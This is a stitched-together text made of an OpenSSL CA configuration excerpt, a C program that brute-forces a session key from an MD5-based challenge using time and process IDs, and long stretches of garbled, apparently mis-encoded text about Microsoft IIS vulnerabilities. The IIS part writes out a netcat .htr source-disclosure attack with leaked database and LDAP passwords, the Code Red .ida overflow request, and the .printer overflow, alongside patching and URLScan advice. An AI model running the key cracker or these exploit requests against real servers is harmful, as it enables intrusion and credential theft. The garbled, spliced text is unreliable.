#1.organizationName = Second Organization Name (eg, company)
#1.organizationName_default = World Wide Web Pty Ltd

organizationalUnitName = Organizational Unit Name (eg, section)
organizationalUnitName_default = ITU

commonName = Common Name (eg, YOUR name)
commonName_max = 64

emailAddress = Email Address
emailAddress_max = 40

# SET-ex3 = SET extension number 3

[ req_attributes ]
challengePassword = A challenge password
challengePassword_min = 4
challengePassword_max = 20

unstructuredName = An optional company name

[ usr_cert ]

# These extensions are added when 'ca' signs a request.

# This goes against PKIX guidelines but some CAs do it and some software
# requires this to avoid interpreting an end user certificate as a CA.

basicConstraints=CA:FALSE

# Here are some examples of the usage of nsCertType. If it is omitted
# the certificate can be used for anything *except* object signing.

# This is OK for an SSL server.
# nsCertType = server

# For an object signing certificate this would be used.
# nsCertType = objsign

# For normal client use this is typical
# nsCertType = client, email

# and for everything including object signing:
# nsCertType = client, email, objsign

# This is typical in keyUsage for a client certificate.
# keyUsage = nonRepudiation, digitalSignature, keyEncipherment

# This will be displayed in Netscape's comment listbox.
nsComment = "Certificate issued by https://www.sopac.org/ssl/"

# PKIX recommendations harmless if included in all certificates.
subjectKeyIdentifier=hash
authorityKeyIdentifier=keyid,issuer:always

# This stuff is for subjectAltName and issuerAltname.
# Import the email address.
# subjectAltName=email:copy

# Copy subject details
# issuerAltName=issuer:copy

# This is the base URL for all others URL addresses
# if not supplied
nsBaseUrl = https://www.sopac.org/ssl/

# This is the link where to download the latest Certificate
# Revocation List (CRL)
nsCaRevocationUrl = https://www.sopac.org/ssl/sopac-ca.crl

# This is the link where to revoke the certificate
nsRevocationUrl = https://www.sopac.org/ssl/revocation.html?

# This is the location where the certificate can be renewed
nsRenewalUrl = https://www.sopac.org/ssl/renewal.html?

# This is the link where the CA policy can be found
nsCaPolicyUrl = https://www.sopac.org/ssl/policy.html

# This is the link where we can get the issuer certificate
issuerAltName = URI:https://www.sopac.org/ssl/sopac.crt

# This is the link where to get the latest CRL
crlDistributionPoints = URI:https://www.sopac.org/ssl/sopac-ca.crl

[ v3_ca ]

# Extensions for a typical CA

# PKIX recommendation.
subjectKeyIdentifier=hash
authorityKeyIdentifier=keyid:always,issuer:always

# This is what PKIX recommends but some broken software chokes on critical
# extensions.
# basicConstraints = critical,CA:true
# So we do this instead.
basicConstraints = CA:true

# Key usage: this is typical for a CA certificate. However since it will
# prevent it being used as an test self-signed certificate it is best
# left out by default.
# keyUsage = cRLSign, keyCertSign

# Some might want this also
# nsCertType = sslCA, emailCA

# Include email address in subject alt name: another PKIX recommendation
# subjectAltName=email:copy
# Copy issuer details
# issuerAltName=issuer:copy

# RAW DER hex encoding of an extension: beware experts only!
# 1.2.3.5=RAW:02:03
# You can even override a supported extension:
# basicConstraints= critical, RAW:30:03:01:01:FF

# This will be displayed in Netscape's comment listbox.
nsComment = "Certificate issued by https://www.sopac.org/ssl/"

# This is the base URL for all others URL addresses
# if not supplied
nsBaseUrl = https://www.sopac.org/ssl/

# This is the link where to download the latest Certificate
# Revocation List (CRL)
nsCaRevocationUrl = https://www.sopac.org/ssl/sopac-ca.crl

# This is the link where to revoke the certificate
nsRevocationUrl = https://www.sopac.org/ssl/revocation.html?

# This is the location where the certificate can be renewed
nsRenewalUrl = https://www.sopac.org/ssl/renewal.html?

# This is the link where the CA policy can be found
nsCaPolicyUrl = https://www.sopac.org/ssl/policy.html

# This is the link where we can get the issuer certificate
issuerAltName = URI:https://www.sopac.org/ssl/sopac.crt

# This is the link where to get the latest CRL
crlDistributionPoints = URI:https://www.sopac.org/ssl/sopac-ca.crl

[ crl_ext ]
# CRL extensions.
# Only issuerAltName and authorityKeyIdentifier make any sense in a CRL.
# issuerAltName=issuer:copy
authorityKeyIdentifier=keyid:always,issuer:always

#----End----

a =B* a 6 _CA] 6 ,F 'X " ) 2 ) SL A) 6 ,

openssl x509 -in cacert.pem -out cacert.crt

a "h @ ,6 H? 3 O) -,< E % '2 http://yoursite.com/ssl/cacert.crt ? < crt \ " ,< 0 <– R •Y , $, ) - 3• H . , " U4 @ P < 5< 6 #6•Y " & 5 <0 < ") 6 3 6 @ B F ") 0, 5 'X , " j ? •Y b update 'G 3- B 5F " ) - 3•S B Netscapeb 2 0, K5 %. ? 5 5< @ ) ,6 d * SL %/ N4 ) < (E 6& \ , C 5 / SL B / ? 4 %P H" , d* 0 … ) 6,› 3 5 $%5 5! @ 6> $ ? 'X 0, 6 , F) ) SL ), < SL A) O) " 0, 5 YB* ("c – 6— 6 , 3% ! ') # —6 5< < 6 ), Nh5 -N4 # F ') # P # 7, , # 5< ) a Mozilla ) Netscape : O) # - , , " ,6 * ? O) $ ) 42 5< ) -,< - @ 5< 6 F? 0 6 b 2 `560, 5 6 3 j< 4 ) ), O) ) , CA 6 CA , < ) $ " " , < MIME \ " B' 7 # 6 - Y O) $ % !
a Galeon ) ,< ,6 3 6 2 " , –6 SL A) HTML 5F 0 " ) F) Galeon , 6 6 " $, % 5! Mozilla , 3 & 2 CH Galeon ), a Internet Explorer I'/ ) " 0 9 6 D ?@ S L @ 2 2 T % ') - 3 6 & d* , B- : IE _-, < Z> 6,G 6 3] I.12 " , F SSL %•) 4 " , — ) h @ ) - Y SL A) ? ) b ) % ' ) 0, K5 - 3• 3 , 3 6 SL 5! ,6 3 5 ! 6 2 # KE @ 6 6 ,< -,< Z> CA 0, K5 - Y 6- aC?"

#include <std/disclaimer.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen, memcmp */

typedef unsigned int UINT4;

#define S11 7
#define S12 12
#define S13 17
#define S14 22
#define S21 5
#define S22 9
#define S23 14
#define S24 20
#define S31 4
#define S32 11
#define S33 16
#define S34 23
#define S41 6
#define S42 10
#define S43 15
#define S44 21

#define F(x, y, z) (((x) & (y)) | ((~x) & (z)))
#define G(x, y, z) (((x) & (z)) | ((y) & (~z)))
#define H(x, y, z) ((x) ^ (y) ^ (z))
#define I(x, y, z) ((y) ^ ((x) | (~z)))

/* ROTATE_LEFT rotates x left n bits. */
#define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n))))

/* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4.
   Rotation is separate from addition to prevent recomputation. */
#define FF(a, b, c, d, x, s, ac) { \
    (a) += F ((b), (c), (d)) + (x) + (UINT4)(ac); \
    (a) = ROTATE_LEFT ((a), (s)); \
    (a) += (b); \
  }
#define GG(a, b, c, d, x, s, ac) { \
    (a) += G ((b), (c), (d)) + (x) + (UINT4)(ac); \
    (a) = ROTATE_LEFT ((a), (s)); \
    (a) += (b); \
  }
#define HH(a, b, c, d, x, s, ac) { \
    (a) += H ((b), (c), (d)) + (x) + (UINT4)(ac); \
    (a) = ROTATE_LEFT ((a), (s)); \
    (a) += (b); \
  }
#define II(a, b, c, d, x, s, ac) { \
    (a) += I ((b), (c), (d)) + (x) + (UINT4)(ac); \
    (a) = ROTATE_LEFT ((a), (s)); \
    (a) += (b); \
  }

void MD5Transform1(unsigned char state[16], unsigned char block[64])
{
  UINT4 a = 0x67452301, b = 0xefcdab89, c = 0x98badcfe, d = 0x10325476, x[16];
  unsigned int i,j;

  for (i = 0, j = 0; j < 64; i++, j += 4)
    x[i] = ((UINT4)block[j]) | (((UINT4)block[j+1]) << 8) |
      (((UINT4)block[j+2]) << 16) | (((UINT4)block[j+3]) << 24);

  /* Round 1 */
  FF (a, b, c, d, x[ 0], S11, 0xd76aa478); /* 1 */
  FF (d, a, b, c, x[ 1], S12, 0xe8c7b756); /* 2 */
  FF (c, d, a, b, x[ 2], S13, 0x242070db); /* 3 */
  FF (b, c, d, a, x[ 3], S14, 0xc1bdceee); /* 4 */
  FF (a, b, c, d, x[ 4], S11, 0xf57c0faf); /* 5 */
  FF (d, a, b, c, x[ 5], S12, 0x4787c62a); /* 6 */
  FF (c, d, a, b, x[ 6], S13, 0xa8304613); /* 7 */
  FF (b, c, d, a, x[ 7], S14, 0xfd469501); /* 8 */
  FF (a, b, c, d, x[ 8], S11, 0x698098d8); /* 9 */
  FF (d, a, b, c, x[ 9], S12, 0x8b44f7af); /* 10 */
  FF (c, d, a, b, x[10], S13, 0xffff5bb1); /* 11 */
  FF (b, c, d, a, x[11], S14, 0x895cd7be); /* 12 */
  FF (a, b, c, d, x[12], S11, 0x6b901122); /* 13 */
  FF (d, a, b, c, x[13], S12, 0xfd987193); /* 14 */
  FF (c, d, a, b, x[14], S13, 0xa679438e); /* 15 */
  FF (b, c, d, a, x[15], S14, 0x49b40821); /* 16 */

  /* Round 2 */
  GG (a, b, c, d, x[ 1], S21, 0xf61e2562); /* 17 */
  GG (d, a, b, c, x[ 6], S22, 0xc040b340); /* 18 */
  GG (c, d, a, b, x[11], S23, 0x265e5a51); /* 19 */
  GG (b, c, d, a, x[ 0], S24, 0xe9b6c7aa); /* 20 */
  GG (a, b, c, d, x[ 5], S21, 0xd62f105d); /* 21 */
  GG (d, a, b, c, x[10], S22, 0x2441453); /* 22 */
  GG (c, d, a, b, x[15], S23, 0xd8a1e681); /* 23 */
  GG (b, c, d, a, x[ 4], S24, 0xe7d3fbc8); /* 24 */
  GG (a, b, c, d, x[ 9], S21, 0x21e1cde6); /* 25 */
  GG (d, a, b, c, x[14], S22, 0xc33707d6); /* 26 */
  GG (c, d, a, b, x[ 3], S23, 0xf4d50d87); /* 27 */
  GG (b, c, d, a, x[ 8], S24, 0x455a14ed); /* 28 */
  GG (a, b, c, d, x[13], S21, 0xa9e3e905); /* 29 */
  GG (d, a, b, c, x[ 2], S22, 0xfcefa3f8); /* 30 */
  GG (c, d, a, b, x[ 7], S23, 0x676f02d9); /* 31 */
  GG (b, c, d, a, x[12], S24, 0x8d2a4c8a); /* 32 */

  /* Round 3 */
  HH (a, b, c, d, x[ 5], S31, 0xfffa3942); /* 33 */
  HH (d, a, b, c, x[ 8], S32, 0x8771f681); /* 34 */
  HH (c, d, a, b, x[11], S33, 0x6d9d6122); /* 35 */
  HH (b, c, d, a, x[14], S34, 0xfde5380c); /* 36 */
  HH (a, b, c, d, x[ 1], S31, 0xa4beea44); /* 37 */
  HH (d, a, b, c, x[ 4], S32, 0x4bdecfa9); /* 38 */
  HH (c, d, a, b, x[ 7], S33, 0xf6bb4b60); /* 39 */
  HH (b, c, d, a, x[10], S34, 0xbebfbc70); /* 40 */
  HH (a, b, c, d, x[13], S31, 0x289b7ec6); /* 41 */
  HH (d, a, b, c, x[ 0], S32, 0xeaa127fa); /* 42 */
  HH (c, d, a, b, x[ 3], S33, 0xd4ef3085); /* 43 */
  HH (b, c, d, a, x[ 6], S34, 0x4881d05); /* 44 */
  HH (a, b, c, d, x[ 9], S31, 0xd9d4d039); /* 45 */
  HH (d, a, b, c, x[12], S32, 0xe6db99e5); /* 46 */
  HH (c, d, a, b, x[15], S33, 0x1fa27cf8); /* 47 */
  HH (b, c, d, a, x[ 2], S34, 0xc4ac5665); /* 48 */

  /* Round 4 */
  II (a, b, c, d, x[ 0], S41, 0xf4292244); /* 49 */
  II (d, a, b, c, x[ 7], S42, 0x432aff97); /* 50 */
  II (c, d, a, b, x[14], S43, 0xab9423a7); /* 51 */
  II (b, c, d, a, x[ 5], S44, 0xfc93a039); /* 52 */
  II (a, b, c, d, x[12], S41, 0x655b59c3); /* 53 */
  II (d, a, b, c, x[ 3], S42, 0x8f0ccc92); /* 54 */
  II (c, d, a, b, x[10], S43, 0xffeff47d); /* 55 */
  II (b, c, d, a, x[ 1], S44, 0x85845dd1); /* 56 */
  II (a, b, c, d, x[ 8], S41, 0x6fa87e4f); /* 57 */
  II (d, a, b, c, x[15], S42, 0xfe2ce6e0); /* 58 */
  II (c, d, a, b, x[ 6], S43, 0xa3014314); /* 59 */
  II (b, c, d, a, x[13], S44, 0x4e0811a1); /* 60 */
  II (a, b, c, d, x[ 4], S41, 0xf7537e82); /* 61 */
  II (d, a, b, c, x[11], S42, 0xbd3af235); /* 62 */
  II (c, d, a, b, x[ 2], S43, 0x2ad7d2bb); /* 63 */
  II (b, c, d, a, x[ 9], S44, 0xeb86d391); /* 64 */

  a += 0x67452301;
  b += 0xefcdab89;
  c += 0x98badcfe;
  d += 0x10325476;

  /* We need to swap endianness here */
  state[0] = ((unsigned char *)&a)[3];
  state[1] = ((unsigned char *)&a)[2];
  state[2] = ((unsigned char *)&a)[1];
  state[3] = ((unsigned char *)&a)[0];
  state[4] = ((unsigned char *)&b)[3];
  state[5] = ((unsigned char *)&b)[2];
  state[6] = ((unsigned char *)&b)[1];
  state[7] = ((unsigned char *)&b)[0];
  state[8] = ((unsigned char *)&c)[3];
  state[9] = ((unsigned char *)&c)[2];
  state[10] = ((unsigned char *)&c)[1];
  state[11] = ((unsigned char *)&c)[0];
  state[12] = ((unsigned char *)&d)[3];
  state[13] = ((unsigned char *)&d)[2];
  state[14] = ((unsigned char *)&d)[1];
  state[15] = ((unsigned char *)&d)[0];
}

#define mklcpr(val) ((0xdeece66d*(val)+0x2bbb62dc)>>1)

int main(int argc, char **argv)
{
  int i;
  unsigned char maybe_challenge[16], true_challenge[16];
  unsigned char key[16];
  char *p;
  unsigned long sec, usec, pid, ppid;
  unsigned char eblock[64], cblock[64];
  unsigned char *o1;
  int o2;

  if (argc == 5 && strlen(argv[4]) >= 47) {
    sec = strtol(argv[1], (char **) 0, 0);
    pid = strtol(argv[2], (char **) 0, 0);
    ppid = strtol(argv[3], (char **) 0, 0);
    p = argv[4];
    for (i=0; i<16; i++) {
      true_challenge[i] = strtol(p, &p, 16);
      p++;
    }
  } else {
    printf("Usage: %s sec pid ppid "
           "00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff\n", argv[0]);
    exit(1);
  }

  /* Set up eblock and cblock */
  for(i=0;i<64;++i) eblock[i]=0;
  eblock[8] = 0x80;
  eblock[56] = 0x40;
  for(i=0;i<64;++i) cblock[i]=0;
  cblock[16] = 0x80;
  cblock[56] = 0x80;

  ((int *)eblock)[1] = mklcpr(pid+sec+(ppid<<12));

  for (usec=0; usec < (1<<20); usec++) {
    ((int *)eblock)[0] = mklcpr(usec);
    MD5Transform1(cblock, eblock);

    o2 = 0;
    o1 = &(cblock[0x0f]);
    do {
      if ((*o1)++) break;
      --o1;
    } while (++o2 <= 0x0f);

    o2 = 0;
    o1 = &(cblock[0x0f]);
    do {
      if ((*o1)++) break;
      --o1;
    } while (++o2 <= 0x0f);

    MD5Transform1(maybe_challenge, cblock);

    if (memcmp(maybe_challenge, true_challenge, 0x10) == 0) {
      printf("Found it! The key is ");
      o2 = 0;
      o1 = &(cblock[0x0f]);
      do {
        if ((*o1)++) break;
        --o1;
      } while (++o2 <= 0x0f);
      MD5Transform1(key, cblock);
      for (i=0; i<0x10; i++)
        printf("%2.2X ", (unsigned char) key[i]);
      printf("\n");
      printf("usec = %lu\n", usec);
      exit(0);
    }
  }
  printf("Not found.\n");
  exit(1);
}

Microsoft internet information server (IIS) T , ) O) 6) 2 0,< " 6b. 2 O) ? •Y B 5/ 1! M,6 -,< ;! 256) YGX$? # B) )h 4 2 +' , ,F n & n 9" IIS ) ( < 6* a I , B , ) 6=GX \ Y, YGX 6 Y1 IIS # G ) 6, i X 0,E N T) E 785/ 2 ) P1 # (DLL) # B 6 6 * ) 4 , " ! 5E H ) 6$;.P 2 @ ! 6 Y1 £ B ! B 5/ - % G N, # B ! B 5/… 3 B ! B 5/… ? IIS - P1, -,< IIS ? IIS 1Q ? #<@ - NB 4 6F 6ˆ4 b -,< K , ,F 7c L. " -) " F$showcode.asp 7 2 `56) , -,< K 0, -,< K H O) ? • Y 785/ )_MDAC/RDS]- ' & 3 3 2 " 5 - " #<@$::$DATA P <6 7 !89 " ? 0 ) # IIS 4" 56% 1 256 0 6=GX 7 - Y 7 IIS ! 5E 2 inetinfo.exe$ ,6* 0, - % ' b .prniter, , 4 % ' E " DDL 3 B'2 - TQ 0 < 6 K 7 B ) 256 ) , 6 v 4 $, 3 IIS " E B 5! 7 L3 , 4 -, < / 9 DDL " $_, < 3 F % '2 0, bP - N 4 j 40 N ISAPI 7 B 5! ( E w 3 PHP)COLdfusion I K6-, " /7 IIS S L ? " ) - 1 @ B) " - 6 B'" $IIS0, 5 ), @0 , 3 f 0, % ' $ 1 2 3 'j 4 7 5G 2 ISAPI " - Y P4 F ' R4 S @ ^ ISAPI 6 H B 5/ $n 9 2 " ,< O * " 6 ' ? 5F 6 @^ F -, 6 U ) ) ) 6% L * iX 0, 4 ) 7 # 0_URL 6=GX) 78# ) -, < - )@ o " ], 5 , 5 7 6 5$ ), 6' -, 6 U ) ) i. ) H ? 5F $ F 6 ) nH , ,F R4 S @ ^ F) N ntdll.dll webDAV SL IIS ) T#< ) =GX 3 " F 6h @ I ], N 0, 5 6 ' -, < SL T L. " N 6 ) ) " ?5F 3 - *1 7 _PHP)coldfusion $ R4 S @ ^ H $O) ( N (, !0, - 5 - Y F F) E ) ) 6URLb 6 , N) # 6, 6DLL ? 5 TG' g]dos \ " 785/ ?# $ IIS 5.0 3 I g " l '=GX " 8Q 0 )@ C _SL ] 7 L ? 56 B ) - Y $O) 2 56, -,< I N "$ 1 ) S L " U 4 IISS R 4S 6 L C85! ) - PS L B'\ 2 " " E + E'IIS 6 ) )‚ code red2 ) code red0, _U ) k " ,G , 5 -,< ;! - Y Z % .6 3 M ,6 )e ? •Y B3 3 4 RN $p ISAPI -,< ,F ) W 3 7 B 5! (&B $ ISAPI 6 B'" ) O) V < )_server side includes]SSI$_active server pages]ASP k ?
P1] 3 ], < 7 ) X ") F ", ) & , # 4 (,! % 1 , , & IIS 1Q0_ N T L. ,< T L. 1 -handel internet server application programming interface 2 <R 1 , n 9 " 785/ 1 ) ) N , GH ) 1QZ&F P 10 I, 6, -" F -,< ? 0, - @- - Y Z < ISAPI 0 < ISAPI DLL 0, < ' & IIS O) b - 4 ' ( E ISAPI ) 785/$ < 6) & " 4 pqqp T 785/ 2 6=GX " " j* 2 N # pqqp T 2 ' 0 & % )@ = P 4 HTTP , @ - 1 @ b ISAPI DLL ) ^ ? eEye n 9" k ‹pq C P 0 @ 1Q F ' & 3 " # Digital security$pqqw ISAPI B' % # ) 4_c:\winnt\system32\msw3prt.dll] B' k #P < 6 N4 "T Q -,< " 0 printer P 4 _IPP]s # 3) h 0, - (8! $, 0, ) ) pqqw T Ÿ 0 6 B'?) " 60, , < ? ) nimda)codered ) ASP 7 .Y 0, < 0T 85/ 2 % 6ISAPI DLL O) ) -,< @" <- =B* ' ,@ 'printer F ISAPI 0 ',6 3 lY 2 IPP0, 6 PF H) Ÿ HOST 3 6 2 420[buffer] 5 H H GET/NUL.printer HTTP/1.0 HOST:[buffer] "), ) < < <& ;! )_information], =GX 2 ;! , IIS) 0 < P 10, ' F- ) " , - e 'j 4 ) < ;! - IIS 1 ) 7 1/ 1P 7 L ;! $ < " , - - ) IIS # N60_ < B H B G 1/ ) , 2 pqqq O) ,4 ‚,6 H) # &F ] 3 ) IIS . [ ˆ6 ) ) ,6 Ÿ IIS 3 'L 2' R 6:3 internet printing protocol ISAPI DLL 5 printer ' & b )@ 6 3 + F) ISAPI DLL j 5 !89 ? , ,< F) ? # " %P H " ,< l ' bB g +P % '2 < " - Y , 5< +.htr 3 F) ISAPI DLL @j 5 ,< , - j 5 - 3 ) , F" G F 0, ,6 =GX $ < F IIS b <N ISM.DLL htr.txt ( F % '+ ISM.DLL -, ,< '0 ! 1/ 7 < " 3 TQ +.htr '" ?@ ? 56 -, @ + " E$ " U) ,< Ÿ 1Q 5 H 2 Q /P " • & - ;! 
) , 5< ' 3 =GX - ?@ G0 , 6 1Q 2 0 < Y bB g ' < 7 G:H$5 ) 4IIS 3 " " ISAPI DLL <) ) N F < 6- _Source Disclosure]+ % ' ISAPI DLL % '.htr, 40 , , Y E - 2 " NetCat Ÿ 0 N GET/sitel/global.asa+.htr HTTP/1.0 [CLRF] [CLRF] 5< -,< H R4 S @ ) netcat B ) 9P " - Y a, -,6 f , c:\>nc -vv www.victim.com 80<htr.txt www.victim [10.0.0.10]80(http)open 200 OK HTTP/1.0 server:microsoft-IIS/5.0 date:thu,25 jan 2001 00:50:17 GMT <!--filename=global.asa-->("profiles_connectstring") "DNS=profile;UID=company_user;password=secret" ("DB_connectstring") ="DSN=db;UID=company_user;password=secret" ="DSN=phf;UID=sa;pwd=" ("PHFconectstring") ("sitesearchconnectionstring")="DSN=sitesearch;UID=company_user;pas sword=simple" ("connectionstring")="DSN=company;UID=company_user;password=gu essme" ("email_pwd")="sendaemon" ="LDAP://DIRECTORY.COMPANY.COM:389" ("ldapserver") ("LDAPUSERLD")="CN=DIRECTORY ADMIN" ("LDAPPWD")="SLAPDME" ? $GLOPA.ASA% ' , T 5G 7 5<0 -,< S# ) -, & ,1 7 5B " 6P< , ,< F ISAPI DLL R4 S @ " N 4) 0 < T/0, 3 @ 56- - Y & , 3 6ISAPI DLL ,< ) ) 7 !89 7 ;! F) B , 2 560 < ;! @ MR / 0, MR / ), B !$ - 'X ? GF' B 6 E ) ? DLL 6-, <N MR/ 7 +.HTR + " -,6 Ÿ = B* A) 2 , 6 3 ;. %LY j 5 7 !89 , ‚ ISAPI : 56 +.HTR ? )&' 0 < 5 - -,< ?@ ? j 5 ;! ?@ 1P H GLOBAL.ASA % ' -,6 6 * ') PRINTER ' @ MR / (,! ) , < TG' g 5 6 D l '-, ,! 78# , < ^ I'/ IIS ) < <N DLL @ F 0, - 56DLL I'. @ ) 6% ' 6 4 B' < 15 / 785/ " ?E ISAPI DLL0 E + GZE #; $E7W $E A? +!=W E$E % 0 +E = * !#+ IIS?! j;R !5 $@ ?@g C 8 e *g $ >> QR g7= << = ? 2 ) <N ; ! , 6% ', B$, a, , -,6 T G' g COMPUTER ) $, < ?@ 5< " 6DLL ? 4h U $, DLL PROPERTIES U O* ) •MASTER PROPERTIES •WWW SERVICE •EDIT •PROPERTIES OF THE DEFAULT WEB SITE •HOME DIRECTORY •APPLICATION SETTING •CONFIGURATION •APP MAPPINGS ?@ ) PRINTER , 4 B' MSW3PRT.DLL % '$ %#<0, N <N 6ISAPI DLL @ F) ISS N56 6DLL - 56 @" MR/ < " 7"' <N R4 S @ >G " T),F , < 0 L " %# < , - ? 
P 1 ^ < 0 &'( ) ACTIVE SERVER .ASP BUFFER PAGES OVERFLOWS,MS02- FUNCTIONALITY 018 WEB-BASED .HTR +.HTR PASSWORD RESET SOURCE DISCLOSURE,MS01004 INTERNET .IDC 6 DATABASE ? # <@ Q193689$O) CONNECTOR SERVER-SIDE .STM,SHTM,SHTM1 ' INCLUDE & MS01-044$ ) INTERNET .PRINTER - ' PRINTER & MS01-023 ) INDEX SERVER .IDA,IDQ - ' & MS01-033$ ) FRONTPAGE UNINSTALL FPSE SERVER EXTENSION REMOTE RAD SUPPORT MS01- IUSR ' & RAD 035 SUPPORT ' ) # HOTFIX )PATCH ISAPI DLL +' , & N =B* <N 6 6 g8 0 F) MS01-026, - - R4 S @ 1 ),< 6PATCH " , -,Y -, @ 6-, 5< # @ 78# ISAPI DLL , -, < , ) SL B ) 6% 4 MR/ ISAPI DLL 78# P 9 6S % B 5F " 0 F) 78# N +' ' ) # ‹ R4 S @ () , 7 B) @] 4 ,N - %/ N < ') # A & microsoft security bulletine 5< 6 g8 2 " ( , 6 _, < 0, ,4 ' ) # $, ,F 6PATCH 0 - pqqwT R4 S @ ?@ ") _HFNETCHK.EXE] Š j 4 HFNETCHK # " % P H P 10, 6 -, < - A & ' ) # - 6? , 6 ?# 0, K5 SL ' ) # b -,< ( E -, < K 6 < " (N " ") 0,6 (E$ - ' ("c$ - Y IIS - 5 PHP P ), 6 " # GF F l '7c L. ? @ ) - @ T L. ) UPDAE WINDOWS 6U ) (N $ ' ) # 6 -, < 'X 7c L. g] -,< 'X 7c L. 2 ), \) < -, < 'X 6 ) HOTFIX i: 3 7 !89 , # j 4 -, < K PATCH 2 3@ : 5 HFNETCHK 6 XML B X ! P 1 #P< HOTFIX -, K ) PER1IIS,COULDDUSION I " 1 6 #P< " 6PATCH 2 3@ - - N4" PATCH , I 5< IIS ) ) SERVICE PACK A & ) , b g8 2 p• -, 6 ? 6PATCH % <$ bP ) ("c ? , IIS ("c ) - P ' ) # 0, 6 ( E C IIS 3 _ ') # URLSCAN,IISLOCHDOWN " - Y ISSLOCKDOWN WIZARD ( , #4 0,< )“CUSTOM’ 3 & 1/ IISS L d* 6 '$ IIS SL a T G' g 0 ISS $ l ' ^ P 6U ) 5< -, 6 U ) & d* F 3 : ' ) # $pqqw T j $ ?@ I 7 "7 B, 6 " 3) : 56) % 4 IIS “EXPERT“ u? u T5! ?# $ S -" Fa 2, 0 5 ) • P 1_NNTP,SMTP,FTP,WWW], 5 network hotfix checker 5< I - 5 -, < K b C 5! 6 5 MR/ )_,< T) , 5 7 < " $O) . 6 ISAPI • ?@ F) + 2 `56) IIS Z F " O) -, 6 U ) 0_TFTP.EXE )CMD.EXE I ] g % N ]WEBDAV ? 5 T G' ga 'X b. # EXTENSIONS ? - Y ?5F gaSCRIPT 5 T G' MAPS• _PRINTER)ISM)IDQ)HTRa I ] @ 2' R ) IIS CP - -, < - 1 c 6 ' B H" % 6 3 5 ‚, >G P 10, < ? 5 % ! N 5 E 6 PF - ) 4 3 7 L* " IIS W L* #4 #B 5! ) O) -, 6 U ) ) % 9 ? 
B F 5 ) ,< - & aURLSCAN• B' ˆ 6 6hotfix) SERVICE PACKS L - , # $, , 6 " @ ˆ6 ) IISLOCKDOWN0, & 6 PF " ) S L ) " " , 2 ,F 7 # ?@ 6& ? " URLSCAN$ -, 5 (E , "), ) IISLOCKDOWN #4 3 IISLOCKDOWN0 0,< %'g N @" @ I'. ˆ 62 `56$, 6 ) L* ) X ? 5 B3 URLSCAN L , P 1 5<0 < SL _IISLOCK.EXE] IISLOCKDOWN a, 6 ( E C:\>IISLOCK.EXE/Q/C/T:C:\LOCKDOWN_FILES IISLOCKDOWN n 9 " URLSCAN SL ,< N A) 0 < SL , , , ' -, ISAPI 3 5L ) ,< 37 URLSCAN.INI)URLSCAN.DLL % ') % < URLSCAN ,< ,< P 1 B' URLSCAN.DLL0 IIS # " % PH ) , , % 5! % K/ H$SL , ?56 H IIS B F ) # 4 % ' URLSCAN.INI ) , % B . ' R4 URLSCAN ISAPI b , PHTTP 3 @, \ $, % ' P 1]0 < - 3•SL URLSCAN.LOG ( ?56 3•URLSCAN.MMDDYY.LOG( - 2 #5 A & HTTP 404 OBJECT NOT v 4 , HTTP 4 P [ FOUND ' 5 URLSCAN , # 4 3 6 URLSCAN_ < 3 0, " % ' ? a 'R ,< _- g ) HEAD)POST)GET, 7 5B ] -,< , 5 H2 3 3 , , 6 3 ,G ;/P ] V # <) h … 4h … 6URL h … B', -,< & _,< 6URL NON-ASCII 6 " 3 : X nP9 , 6 >/ h … 3S >/ h … 6, @ >/ h … W L* F) d * 6 4 2 " (, 6 0, < <R URLLSCAN.INI % ' 6) < & IIS ?,< F ? " , 0 < " , - - ) IIS < b' URLSCAN.INIa # T5! " b'?@ #P< 6" , 7 " B') , - B) N " ?) 5 ? , 4 bB 4 2 ,@ #6 , ) F ? T/0, ) F) 3 -, B' ? ,63 B $ H 5 2 ) 0, • !" " #$ % - 0 H % PH " TCP SYS & 4 % 7 ) ) z 3 % j @ N$, 5 )$ < * +! - 4 & 21 ) H @ &F b' ' (! " ) 5 0% F O) ) ?@ - B' 26• c 5G 6 F) 3 %3 " 7 9P -, u (E ^P #P< 6 3 6 , < 5 V B, @ ], < %3 \) < 6 ?) 3 , * 4 , E 2 ?# 2 P 1 ) ) _€ Y + H) P[ ) V , -, •Y ? )" H)$ )0 \X & 2 ?, 5 ' B IDA/IDQ ISAPI 6, 4 ) 6-, <N NIMDA)CODE RED ( 2 0, % ) ) pqqw T + H) P [ % ', , " 3) - 1 @ " ), ' ) # " B 5/ ' & f 2 , ,F , 1 ;! ? < 3 6h) ) , 56 & 2 " R4 S @ . CODE RED ( P < B 3, <) " N ISAPI DLL TP $,< -, 6) , " pqqp -,< - 1 @‘ ‘ 6) GET/DEFAULT .IDA?NNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNN%0U6858%0UBD3%0U4570%0U7801%0UU9090%0 U6858%0UCBD3%0U78%0U455%0U00000%0U00=A7 0, E - 1 @ \X %SYSTEM%\NOTWORM 2 -, 6 ? - 1 @ CODE RED ( 2 `560, < ,4 u( 2 ,< 7# 2 N4 @V# 3 < 0, 6, 9 2 -, 6 ? 
$ - + H) P [ 6% ' 5I 7 0, < ; +!0x90 0x90 %u9090 # : ,< % ' ROOT.EXE % ' >/ - 1 @ 6% '2 `56), 560, >/ TQ ? ! X /T / "), ) % < 7 NIMDA( ,< ) % ' ,G 2 `56NIMDA)CODE RED 6 - ./0 ( 7 , ) H? , " , 8 + 5 5< , +1 2 " 34 5 6 nop " @A x86 = U4 4 78 > ? 8 6- "( 7 < -source code #' , < , :B g e '2 0 N , 6U a " SQL 7 , ‚, < " 5 5 <+ % 5< 6:3 2 B) - -N4 '%# IIS 6, ?, 5! " ^P 1#< 2 4 .INC @? 0 !89$% 5 h @ , T5! ,< 6, ( ? 4 ) j 4 I 7 R4 S @ ? 2 " %P H U 40 , < - @ , R4 S @ ) , < - 85/ 2 & 7 5B… INCLUDE B'" - Y … # . # ) ?) 0, 0 6 3 ;. %LY <) 2 9 " R4 S @ ^ @ +' F 6N 4 , )- ,4 N - # 3 ,G ;/P HTTP GET R4 S @ OK(/DEFAULT.ASP /DEFAULT.ASP+.HTR +.HTR SOURCE DISCLOSURE ERROR PERFORMING MS01-004 /FILE.STM,.SHTM,.SHTM1 WEB QUERY 500 j 4 2 ? N SOURCE MUST BE PRESENT 500 # , < R4 S @ v 4 j 